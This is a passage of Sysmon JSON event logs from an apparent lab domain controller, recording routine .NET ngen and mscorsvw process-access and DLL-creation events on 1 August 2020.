08:07:15.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010A0A71000}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:15.490\r\nProcessGuid: {41C8662E-22B3-5F25-0000-0010A0A71000}\r\nProcessId: 4588\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11ec-0\\System.Windows.Forms.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 08:07:15.490","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:15.490","ProcessGuid":"{41C8662E-22B3-5F25-0000-0010A0A71000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11ec-0\\System.Windows.Forms.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 08:07:15.490","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001005D30F00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001005D30F00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001005D30F00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001005D30F00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010A2AB1000}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010A2AB1000}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.568\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010CDAE1000}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.568","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010CDAE1000}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.568\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010CDAE1000}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.568","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010CDAE1000}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.568\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010CDAE1000}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.568","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010CDAE1000}","TargetProcessId":"816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:15.693\r\nProcessGuid: {41C8662E-22B3-5F25-0000-0010CDAE1000}\r\nProcessId: 816\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\330-0\\System.Windows.Input.Manipulations.dll\r\nCreationUtcTime: 2020-08-01 08:07:15.693","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:15.693","ProcessGuid":"{41C8662E-22B3-5F25-0000-0010CDAE1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\330-0\\System.Windows.Input.Manipulations.dll","CreationUtcTime":"2020-08-01 08:07:15.693","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.725\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001025B21000}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 